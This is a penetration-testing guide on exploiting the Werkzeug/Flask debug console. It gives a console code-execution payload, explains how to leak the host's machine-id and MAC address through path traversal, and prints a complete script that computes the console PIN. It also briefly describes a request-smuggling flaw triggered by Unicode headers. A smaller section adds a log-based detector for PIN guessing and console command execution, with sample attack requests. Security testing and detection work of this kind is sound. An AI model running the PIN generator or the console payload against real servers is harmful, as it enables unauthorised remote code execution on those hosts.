Werkzeug / Flask Debug


Console RCE

If debug mode is enabled, you can try to access /console and obtain RCE.

```python
__import__('os').popen('whoami').read();
```

There are also several exploits available online, such as this one, or the one in Metasploit.

Pin Protected - Path Traversal

In some cases, the /console endpoint will be protected by a PIN. If you have a file traversal vulnerability, you can leak all the information needed to generate that PIN.

Werkzeug Console PIN Exploit

Force a debug error page in the application to see this:

```
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
```

A message regarding the "console locked" scenario is encountered when attempting to access Werkzeug's debug interface, indicating a requirement for a PIN to unlock the console. The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py). The PIN generation mechanism can be studied from the Werkzeug source code repository, though it is advised to procure the actual server code via a file traversal vulnerability due to potential version discrepancies.

To exploit the console PIN, two sets of variables, probably_public_bits and private_bits, are needed:

probably_public_bits

  • username: The user who started the Flask application.

  • modname: Typically named flask.app.

  • getattr(app, '__name__', getattr(app.__class__, '__name__')): Typically resolves to Flask.

  • getattr(mod, '__file__', None): The full path to app.py within the Flask directory (for example, /usr/local/lib/python3.5/dist-packages/flask/app.py). If app.py does not work, try app.pyc.

private_bits

  • uuid.getnode(): Obtains the MAC address of the current machine; str(uuid.getnode()) renders it in decimal form.

  • To determine the server's MAC address, identify the network interface used by the app (for example, ens3). If unsure, leak /proc/net/arp to obtain the device id, then extract the MAC address from /sys/class/net/<device id>/address.

  • Converting the hexadecimal MAC address to decimal can be done as shown below:

```python
# Example MAC address: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692
```

  • get_machine_id(): Combines data from /etc/machine-id or /proc/sys/kernel/random/boot_id with the first line of /proc/self/cgroup after the last slash (/).

Code for `get_machine_id()`

```python
import typing as t

_machine_id: t.Optional[t.Union[str, bytes]] = None


def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
    global _machine_id

    if _machine_id is not None:
        return _machine_id

    def _generate() -> t.Optional[t.Union[str, bytes]]:
        linux = b""

        # machine-id is stable across boots, boot_id is not.
        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
            try:
                with open(filename, "rb") as f:
                    value = f.readline().strip()
            except OSError:
                continue

            if value:
                linux += value
                break

        # Containers share the same machine id, add some cgroup
        # information. This is used outside containers too but should be
        # relatively stable across boots.
        try:
            with open("/proc/self/cgroup", "rb") as f:
                linux += f.readline().strip().rpartition(b"/")[2]
        except OSError:
            pass

        if linux:
            return linux

        # On OS X, use ioreg to get the computer's serial number.
        # (The macOS and Windows branches are truncated on this page; see
        # werkzeug/debug/__init__.py in the target's version for the rest.)
        return None

    _machine_id = _generate()
    return _machine_id
```

After gathering all the required data, the exploit script can be run to generate the Werkzeug console PIN. The script uses the collected `probably_public_bits` and `private_bits` to build a hash, which is then processed further to produce the final PIN. Below is the Python code implementing this process:

```python
import hashlib
from itertools import chain

probably_public_bits = [
    'web3_user',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
    '279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
    'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```

This script produces the PIN by hashing the concatenated bits, adding specific salts (cookiesalt and pinsalt), and formatting the output. It's important to note that the actual values for probably_public_bits and private_bits need to be accurately obtained from the target system to ensure the generated PIN matches the one expected by the Werkzeug console.

If you are on an older Werkzeug version, try changing the hashing algorithm to md5 instead of sha1.
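PIN unlock attempts and console code evaluation both go through the debugger's `__debugger__=yes` query interface, so they leave a clear trail in the dev-server log. As an added example (not from the original page or from Werkzeug), here is a small Python detector run over constructed sample log lines; the log format matches what werkzeug.serving prints, while `pin_threshold` and the finding names are this example's own choices.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in the Werkzeug dev-server log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024 10:01:02] "GET / HTTP/1.1" 200 -
10.0.0.9 - - [12/Mar/2024 10:01:05] "GET /console HTTP/1.1" 200 -
10.0.0.9 - - [12/Mar/2024 10:01:06] "GET /console?__debugger__=yes&cmd=pinauth&pin=123-456-789&s=AbCdEf HTTP/1.1" 200 -
10.0.0.9 - - [12/Mar/2024 10:01:07] "GET /console?__debugger__=yes&cmd=pinauth&pin=111-222-333&s=AbCdEf HTTP/1.1" 200 -
10.0.0.9 - - [12/Mar/2024 10:01:08] "GET /console?__debugger__=yes&cmd=pinauth&pin=999-888-777&s=AbCdEf HTTP/1.1" 200 -
10.0.0.9 - - [12/Mar/2024 10:01:20] "GET /console?__debugger__=yes&cmd=__import__('os').popen('whoami').read()&frm=0&s=AbCdEf HTTP/1.1" 200 -
10.0.0.5 - - [12/Mar/2024 10:02:00] "GET /static/app.js HTTP/1.1" 200 -
"""

# 'ADDR - - [TS] "METHOD TARGET PROTO" STATUS -' as printed by werkzeug.serving
LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

# Built-in debugger commands; any other cmd= sent together with frm= is Python
# source evaluated inside a traceback frame.
DEBUGGER_CMDS = {"resource", "pinauth", "printpin"}


def classify(target):
    """Classify one request target: 'pinauth', 'exec', 'debugger', 'console' or None."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    if qs.get("__debugger__", [""])[0] != "yes":
        return "console" if parts.path == "/console" else None
    cmd = qs.get("cmd", [""])[0]
    if cmd == "pinauth":
        return "pinauth"
    if cmd and cmd not in DEBUGGER_CMDS and "frm" in qs:
        return "exec"
    return "debugger"


def analyze(log_text, pin_threshold=3):
    """Return (source, finding, count) tuples for PIN guessing and console code execution."""
    per_src = {}  # source address -> Counter of request kinds
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = classify(m.group("target"))
        if kind:
            per_src.setdefault(m.group("src"), Counter())[kind] += 1
    findings = []
    for src, c in per_src.items():
        if c["pinauth"] >= pin_threshold:
            findings.append((src, "pin-guessing", c["pinauth"]))
        if c["exec"]:
            findings.append((src, "console-exec", c["exec"]))
    return findings
```

The debugger itself delays failed PIN attempts and refuses further ones after more than ten, so even a short burst of pinauth requests from one source is worth alerting on; the real mitigation is never running the debugger on a reachable host.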

Werkzeug Unicode chars

As seen in this issue, Werkzeug does not close a request containing Unicode characters in its headers. And as explained in this writeup, this can lead to a CL.0 Request Smuggling vulnerability.

This is because, in Werkzeug, it is possible to send certain Unicode characters that make the server break. However, if the HTTP connection was established with the Connection: keep-alive header, the request body is not read and the connection remains open, so the body of the request is treated as the next HTTP request.

Automated Exploitation

References
